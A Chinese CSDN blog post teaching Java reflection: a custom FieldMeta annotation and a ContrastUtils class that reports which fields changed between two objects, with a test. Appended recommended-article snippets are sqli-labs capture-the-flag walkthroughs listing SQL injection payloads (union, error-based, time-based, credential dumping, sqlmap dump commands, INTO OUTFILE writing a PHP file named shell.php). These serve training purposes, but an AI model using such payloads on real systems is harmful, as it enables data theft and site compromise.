反射比较两个对象那些数据发生变化

最新推荐文章于 2024-08-22 19:11:57 发布
最新推荐文章于 2024-08-22 19:11:57 发布
阅读量296 收藏
点赞数
分类专栏: JAVA 文章标签: java spring maven
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/weixin_43682323/article/details/128017050
版权
本文详细介绍了Java反射机制,包括如何通过反射访问私有属性,使用setAccessible方法绕过访问检查,以及如何利用反射比较并展示两个对象字段的差异。通过自定义注解和工具类,展示了在运行时获取类信息、比较对象差异的方法。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

前言

反射是JAVA语言主要的特征之一。它是允许运行中的java程序对自身进行检查。
在java程序中被private修饰的只能在内部访问,外部是不行的,
若想在外部访问private修饰的是可以通过反射实现的。
反射是可以直接操作私有属性的,反射是一个可以在运行时获取一个类的所有信息,操作这些信息的。

常用方法

	//获取到对象的class
  Class<?> oldClass = oldObj.getClass();
  //对象的包名
  oldClass.getPackage().getName()
  //类名User
  oldClass.getSimpleName()
  //完整类名com.xxx.User
  oldClass.getSimpleName()
  //对象的属性列表(比如实体类的各个字段)
  oldClass.getDeclaredFields()

其他知识setAccessible

   		//将此对象的 accessible 标志设置为指示的布尔值。
        // 值为 true 则指示反射的对象在使用时应该取消 Java 语言访问检查。
        // 值为 false 则指示反射的对象应该实施 Java 语言访问检查;
        // 实际上setAccessible是启用和禁用访问安全检查的开关,
        // 并不是为true就能访问为false就不能访问 ;
		setAccessible(true);

反射获取修改对象修改的内容

1:自定义注解

import java.lang.annotation.*;

@Retention(RetentionPolicy.RUNTIME) // 注解会在class字节码文件中存在,在运行时可以通过反射获取到
@Target({ElementType.FIELD,ElementType.METHOD})//定义注解的作用目标**作用范围字段、枚举的常量/方法
@Documented//说明该注解将被包含在javadoc中
public @interface FieldMeta {
    String name() default "";
    String description() default "";
}

2:工具类


import org.apache.commons.lang3.StringUtils;

import java.beans.IntrospectionException;
import java.beans.PropertyDescriptor;
import java.lang.reflect.Field;
import java.lang.reflect.InvocationTargetException;
import java.lang.reflect.Method;
import java.util.Arrays;
import java.util.HashMap;
import java.util.List;
import java.util.Map;

/**
 * 反射
 * 通过反射比较两个对象修改字段的区别
 * <p>
 * ***************************************
 * 反射是Java程序开发语言的特征之一,它允许运行中的java程序对自身进行检查。
 * 被private封装的只能内部访问,外部是不行的,但是通过反射是可以直接操作私有属性的。
 * 反射是一个可以在运行时获取一个类的所有信息
 */
public class ContrastUtils {


    /**
     * 修改记录-字段的分割符号
     */
    public static final String SEPARATOR = ";";

    /**
     * 比较两个对象,并且返回不一致的信息
     *
     * @return
     */
    public static String compare(Object oldObj, Object newObj) throws IntrospectionException, InvocationTargetException, IllegalAccessException {
        String str = "";
        //1:获取到对象的class
        Class<?> oldClass = oldObj.getClass();
        Class<?> newClass = newObj.getClass();
        //2:获取到对象的属性列表
        Field[] oldFields = oldClass.getDeclaredFields();
        Field[] newFields = newClass.getDeclaredFields();
        for (int i = 0; i < oldFields.length; i++) {
            if ("serialVersionUID".equals(oldFields[i].getName())) {
                continue;
            }
            //将此对象的 accessible 标志设置为指示的布尔值。
            // 值为 true 则指示反射的对象在使用时应该取消 Java 语言访问检查。
            // 值为 false 则指示反射的对象应该实施 Java 语言访问检查;
            // 实际上setAccessible是启用和禁用访问安全检查的开关,
            // 并不是为true就能访问为false就不能访问 ;
            oldFields[i].setAccessible(true);
            newFields[i].setAccessible(true);

            //获取到字段上的注解
            FieldMeta annotation = oldFields[i].getAnnotation(FieldMeta.class);
            //当没有注解的时候跳过本次循环
            if (annotation == null || StringUtils.isBlank(annotation.name())) {
                continue;
            }
            //获取注解中的字段名
            String name = annotation.name();
            String description = annotation.description();

            PropertyDescriptor oldPd = new PropertyDescriptor(oldFields[i].getName(), oldClass);
            PropertyDescriptor newPd = new PropertyDescriptor(newFields[i].getName(), newClass);
            //调用成员方法
            Method oldReadMethod = oldPd.getReadMethod();
            Method newReadMethod = newPd.getReadMethod();
            //3:获取到参数数值
            Object oldValue = oldReadMethod.invoke(oldObj);
            Object newValue = newReadMethod.invoke(newObj);
            if (StringUtils.isNotBlank(description)) {
                //a=xxx
                List<String> list = Arrays.asList(description.split(","));
                Map<Object, Object> map = new HashMap<>();
                list.forEach(item -> {
                    List<String> asList = Arrays.asList(item.split("="));
                    if (asList.size() > 0) {
                        map.computeIfAbsent(asList.get(0), k -> asList.get(1));
                    }
                });
                oldValue = map.get(oldValue.toString());
                newValue = map.get(newValue.toString());
            }
            /**获取差异字段*/
            str = getDifferenceFieldStr(str, i, name, oldValue, newValue);
        }

        return str;
    }
    /**
     * 获取差异字段新旧值
     *
     * @param str
     * @param i
     * @param fieldName
     * @param oldValue
     * @param newValue
     * @return
     */
    private static String getDifferenceFieldStr(String str, int i, String fieldName, Object oldValue, Object newValue) {

        if (null == oldValue || StringUtils.isBlank(oldValue.toString())) {
            oldValue = "无";
        }
        if (null == newValue || StringUtils.isBlank(newValue.toString())) {
            newValue = "无";
        }
        if (!oldValue.equals(newValue)) {

            str += fieldName + "从 " + oldValue + ",修改为 " + newValue + SEPARATOR;
        }
        return str;
    }


}

3:测试

@Data
@Builder
@AllArgsConstructor
@NoArgsConstructor
public class TestBo implements Serializable {
    @FieldMeta(name = "性别",description = "1=男,2=女,3=未知")
    private Integer sex;
    @FieldMeta(name = "数量")
    private int sum;
}

 @Test
    public void d() {
        TestBo oldTest = TestBo.builder().sex(1).sum(800).build();
        TestBo newTest = TestBo.builder().sex(2).sum(500).build();
        try {
            String compare = ContrastUtils.compare(oldTest, newTest);
            System.out.println(compare);
        } catch (IntrospectionException | InvocationTargetException | IllegalAccessException e) {
            e.printStackTrace();
        }
    }

4:运行结果

在这里插入图片描述

sqlilabs通关()
Forrest_bear的博客
05-24 2600
就像以下代码一样:隔离空格。
Sqli-lab教程-史上最全详解(1-22通关
qq_52364123的博客
04-10 1万+
sql注入集合
SQLi-LABS通关攻略【21-25关】
qq_65852138的博客
08-22 459
SQLi-LABS通关攻略【21-25关】
sqli-labs通关攻略(全关卡)(更新中~)
C233333235的博客
07-22 1670
7.然后就要进行表名的查询,此处在2的位置用group_concat(table_name),3 from information_schema.tables where table_schema='security'语句进行查询,group_concat的作用是将查询出的表名显示到一行,不然只能显示第一个表名。(别忘了在参数1前面加-,主要是为了使参数变为一个不存在的参数,任何过大的数字或负数,以及小数,科学计数法数字都可以),在这里确定其回显位置为2和3。1.打开关卡,提示我们将参数id填入url中。
Sqli-labs通关教程(手工注入+工具使用sqlmap)
qq_57223070的博客
02-24 1万+
希望能帮到你,sqlmap使用及SQL注入手工
Sqli-labs通关手册1-30关】
李安北的博客
05-03 7557
1.sql注入的原理 1)sql注入的原因 语言分类:解释型语言和编译型语言。解释型语言是一种在运行时由一个运行时组件解释语言代码并执行其中包含的指令的语言。而编译型语言是代码在生成时转换为机器指令,然后在运行时直接由使用该语言的计算机执行这些指令。 例如:在与用户交互的程序中,用户的输入拼接到SQL语句中,执行了与原定计划不同的行为,从而产生了SQL注入漏洞。 2)登录案例讲解 主要是万能密码:登录SQL语句:select * from admin where username = ‘用户输入的用户名’
sqli-labs靶场通关攻略
test_zpx的博客
08-14 4121
Good Good Study,Day Day Up!
sql-labs通关讲解
qq_70836100的博客
07-22 1653
目录。
详细sqli-labs1-20)通关讲解
m0_57928318的博客
05-18 6599
获取数据库名时可以使用 left() 函数,这里使用 substr() 函数截取数据库名的每个字符,然后使用 ASCII() 函数判断这个字符的 ASCII 码值。我们可以看出,GET 方式和post 方式 的区别,GET方式 可以明显的 从 URL 中进行注入,POST可以在数据包中进行修改对应的字段来进行 SQL 注入。获取数据库名时,使用 LEFT() 函数进行穷举法的效率较低,使用 substr() 函数结合 ASCII() 函数进行判断可以使用二分法快速缩小范围。
sqli-labs通关详解
m0_52051132的博客
10-15 7335
sqlmap.py -r ./xx.txt --batch --level 3 --tamper=“base64encode.py” --current-db 爆破表单。sqlmap.py -u ip --data=“uname=admin&passwd=admin” --batch -D security --tables 最后脱库。条件正确有回显,条件错误没有回显,布尔盲注?py -r 文件位置 -p 扫描位置 --batch -D security -T users --dump //脱库。
sqli-labs通关记录
qq_39670065的博客
07-11 2994
sqli-lab通关记录 1.docker搭建 运行:docker info //查看docker信息,确认docker正常 搜索sqli-labs:docker search sqli-labs 建立镜像:docker pull acgpiano/sqli-labs 查看存在的镜像:docker images 运行存在的镜像:docker run -dt --name sqli -p 80:80 --rm acgpiano/sqli-labs (参数解释:-dt 后台运行; --name 命名
sqli-labs通关攻略
jhfjdf的博客
10-13 1505
sqli-labsless 1 less 1 字符型注入,单引号 网址后面接 ?id=1 正常显示,然后判断注入点 ?id=1' and 1=1--+ 将1=1换成1=2,发现没有报错,但不显示信息,说明可以使用字符注入 之后判断列数,使用order by,从1开始逐渐递增,报错时停止。 ?id=1' order by 1--+ ...
sql—labs通关
m0_64674174的博客
10-24 792
主界面由于mysql_real_escape_string的过滤,将单引号,双引号等进行转义,无法进行注入,注册界面以及修改密码界面,由于注册界面以及修改密码见面的闭合方式不一样,可以达到二次注入的目的,创建。安装方法:解压到小皮面板的www的目录下,在sqllabs的sql-connections目录下的db-creds.inc文件,下图划横线位置设置自己的密码即可,从代码角度而言,可以很清楚的看出由单引号闭合,直接使用sql注入的一半流程即可,查询字段,判断回显,数据库——表——列,即可 为。
sqli-labs 通关日志 萌新向
春日野穹
11-16 2127
0x0 引言 sqli-labs是一个用来练习sql注入的平台,其内置集成了现存的各种sql注入,如盲注,联合查询注入等,对于新手来说它是一个十分不错的练习平台,我们可以使用它来进行各种注入尝试,从而提升我们的sql注入能力 萌新建议先看这个帖子再来做题:https://blog.youkuaiyun.com/chest_/article/details/102537988 目录快速导航 环境的搭...
sqli-labs通关大全(更新至Less60)
热门推荐
箭雨镜屋
09-03 2万+
sqli-labs通关(less1~less10)_箭雨镜屋-优快云博客 sqli-labs通关(less11~less20)_箭雨镜屋-优快云博客 sqli-labs通关(less21~less30)_箭雨镜屋-优快云博客
sqli-labs通关教程
m0_65150886的博客
01-23 1903
id=1返回正常页面?id=1'显示sql语句有误?id=1''页面返回正常,证明是字符型注入。因为该页面存在回显,所以我们可以使用联合查询。
sqli-labs通关详解(1-20关)
2302_81105681的博客
04-11 3596
1.首先判断闭合方式在我之前发布的文章中有详细的sql注入判断闭合的方法和原理,参考《sql注入实验原理》在1-6关,我们可以通过在参数后面加\的方法判断闭合\后面的符号就是闭合符号,由此可见第一关的闭合方式为'闭合2.判断字段数当我们输入?id=1' order by 4--+时页面显示没有第4字段,由此判断字段数为3.3.判断回显位因为有三个字段,所以我们使用命令判断出第2,3字段的内容回显在页面中4.爆数据库名我们可以将2或者3更改为database()来使页面回显出数据库名。
sqli-labs-master靶场[超详细通关教程,通关攻略~!]
muyuchen110的博客
07-22 3254
sqli-labs-master[超详细通关教程,通关攻略~!](附解题思路及各注入方法解析)-------持续更新关卡通关教程!!!!
SQLi_Labs通关文档【1-65关】
weixin_30491641的博客
07-23 805
SQLi_Labs通关文档【1-65关】 为了不干扰自己本机环境,SQL-LAB我就用的码头工人,跑起来的,搭建也非常简单,也就两条命令 dockerpullacgpiano/sqli-labsdockerrun-dt--namesqli-lab-p[你要映射的端口]:80acgpiano/sqli-labs:latest 然后在SQL-LAB上直接初始化数...
sqli-labs1-7通关
最新发布
01-01
### SQLi-Labs 1-7 关卡解题思路 #### Less-1: 基础 GET 请求注入 在这一关中,目标是在 URL 参数 `id` 中注入 SQL 语句来获取数据库中的信息。通过输入 `' OR '1'='1` 可以绕过身份验证并登录成功[^1]。 ```sql ?id=1' or '1'='1 ``` #### Less-2: 使用 UNION SELECT 注入 此关涉及使用 `UNION SELECT` 来联合查询其他表的内容。为了找到合适的列数,可以逐个增加返回的结果集数量直到页面不再报错为止。一旦确定了正确的列数,则可以通过这些列读取任意表格的信息[^3]。 ```sql ?id=-1 UNION ALL SELECT NULL,NULL FROM information_schema.tables WHERE table_schema=database()# ``` #### Less-3: 报错注入 利用 MySQL 的内置函数如 `extractvalue()` 或者 `updatexml()` 实现基于错误回显的 SQL 注入攻击。这允许直接从服务器响应中提取敏感数据而无需额外请求。 ```sql ?uname=1' AND extractvalue(1,concat(0x7e,(SELECT database())))--+&passwd=1&submit=Submit ``` #### Less-4: 时间盲注 当无法看到具体的错误消息时,可采用时间延迟技术来进行推测性的注入测试。例如,如果存在漏洞则会使查询等待一段时间再继续执行。 ```sql ?id=1' AND IF(SUBSTRING(@@version,1,1)=5,SLEEP(5),NULL)--+ ``` #### Less-5: 基于布尔条件的时间盲注 进一步扩展上一关的概念,在不知道确切版本号的情况下也可以利用布尔表达式的真假判断配合 SLEEP 函数完成注入操作[^2]。 ```sql ?id=1' AND (IF((ASCII(SUBSTRING(version(),1,1)))>50,BENCHMARK(5000000,SHA1('A')),false))--+ ``` #### Less-6: 多参数注入 本关考察如何处理多个输入字段的同时注入问题。通常情况下只需要在一个地方构造恶意负载即可影响整个查询逻辑[^4]。 ```sql ?id=-1' UNION SELECT 1,GROUP_CONCAT(username,0x7E,password) FROM users # ``` #### Less-7: 文件写入与读取 最后一关涉及到更高级别的功能——将查询结果保存成文件并通过 Web 访问路径下载下来查看具体内容。这一步骤可能需要用到 INTO OUTFILE 子句以及 LOAD_FILE() 函数实现本地文件系统的交互。 ```sql ?id=1' union all select null,'<?php phpinfo(); ?>' into outfile '/var/www/html/shell.php'# ```
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值